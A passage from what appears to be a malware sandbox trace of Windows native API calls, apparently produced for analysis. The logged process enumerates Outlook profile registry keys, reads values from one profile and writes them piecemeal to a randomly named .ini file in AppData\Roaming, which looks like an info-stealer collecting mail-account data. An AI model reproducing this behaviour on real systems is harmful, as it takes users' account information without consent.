KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0236.195] NtClose (Handle=0x138) returned 0x0 [0236.196] NtEnumerateKey (in: KeyHandle=0xb4, Index=0x1, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0236.196] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x138) returned 0x0 [0236.196] NtEnumerateKey (in: KeyHandle=0x138, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0236.196] NtClose (Handle=0x138) returned 0x0 [0236.196] NtEnumerateKey (in: KeyHandle=0xb4, Index=0x2, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0236.196] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\2db91c5fd8470d46b1a5bc5efab4cae7", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x138) returned 0x0 [0236.196] NtEnumerateKey (in: KeyHandle=0x138, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0236.196] NtClose (Handle=0x138) returned 0x0 [0236.196] NtEnumerateKey (in: KeyHandle=0xb4, Index=0x3, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0236.198] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x138) returned 0x0 [0236.198] NtEnumerateKey (in: KeyHandle=0x138, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0236.198] NtClose (Handle=0x138) returned 0x0 [0236.198] NtEnumerateKey (in: KeyHandle=0xb4, Index=0x4, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0236.208] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\6c29d51f56390b45a924b3b787013a66", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x138) returned 0x0 [0236.208] NtEnumerateKey (in: KeyHandle=0x138, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0236.208] NtClose (Handle=0x138) returned 0x0 [0236.208] NtEnumerateKey (in: KeyHandle=0xb4, Index=0x5, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0236.208] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x138) returned 0x0 [0236.209] NtEnumerateKey (in: KeyHandle=0x138, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0236.209] NtClose (Handle=0x138) returned 0x0 [0236.209] NtEnumerateKey (in: KeyHandle=0xb4, Index=0x6, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0236.209] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8763203907727d498bce4b981b157d7b", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x138) returned 0x0 [0236.209] NtEnumerateKey (in: KeyHandle=0x138, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0236.209] NtClose (Handle=0x138) returned 0x0 [0236.209] NtEnumerateKey (in: KeyHandle=0xb4, Index=0x7, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0236.209] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\893893ade607c44aa338ac7df5d6cb42", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x138) returned 0x0 [0236.210] NtEnumerateKey (in: KeyHandle=0x138, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0236.210] NtClose (Handle=0x138) returned 0x0 [0236.210] NtEnumerateKey (in: KeyHandle=0xb4, Index=0x8, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0236.210] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x138) returned 0x0 [0236.210] NtEnumerateKey (in: KeyHandle=0x138, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0236.210] NtClose (Handle=0x138) returned 0x0 [0236.210] NtEnumerateKey (in: KeyHandle=0xb4, Index=0x9, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0236.210] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x138) returned 0x0 [0236.210] NtEnumerateKey (in: KeyHandle=0x138, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x0 [0236.210] NtCreateKey (in: KeyHandle=0xde3cc, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3cc*=0x140) returned 0x0 [0236.219] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.259] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.289] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.291] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.291] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.291] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0xc, ByteOffset=0xdd5fc*=40, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.292] NtClose (Handle=0x144) returned 0x0 [0236.293] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.293] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.293] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.293] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.294] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x52, ByteOffset=0xdd5fc*=52, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.294] NtClose (Handle=0x144) returned 0x0 [0236.315] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x1, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.315] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.315] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.316] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.316] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.316] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x12, ByteOffset=0xdd5fc*=134, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.316] NtClose (Handle=0x144) returned 0x0 [0236.355] RtlIntegerToChar (in: Value=0xfde888b0, Base=0x0, Length=0x20, String=0xdd6e4 | out: String="4259874992") returned 0x0 [0236.355] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.355] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.356] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.356] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.356] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x18, ByteOffset=0xdd5fc*=152, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.356] NtClose (Handle=0x144) returned 0x0 [0236.357] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x2, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.357] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.357] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.358] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.358] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.358] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x18, ByteOffset=0xdd5fc*=176, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.358] NtClose (Handle=0x144) returned 0x0 [0236.359] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.359] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.359] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.359] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.359] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x14, ByteOffset=0xdd5fc*=200, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.359] NtClose (Handle=0x144) returned 0x0 [0236.360] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x3, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.360] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.360] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.361] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.361] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.361] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x1a, ByteOffset=0xdd5fc*=220, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.361] NtClose (Handle=0x144) returned 0x0 [0236.361] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.362] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.362] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.362] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.362] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x12, ByteOffset=0xdd5fc*=246, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.362] NtClose (Handle=0x144) returned 0x0 [0236.366] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x4, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.366] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.366] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.367] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.367] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.367] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x1c, ByteOffset=0xdd5fc*=264, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.367] NtClose (Handle=0x144) returned 0x0 [0236.391] RtlIntegerToChar (in: Value=0x2, Base=0x0, Length=0x20, String=0xdd6e4 | out: String="2") returned 0x0 [0236.391] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.391] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.391] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.391] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, 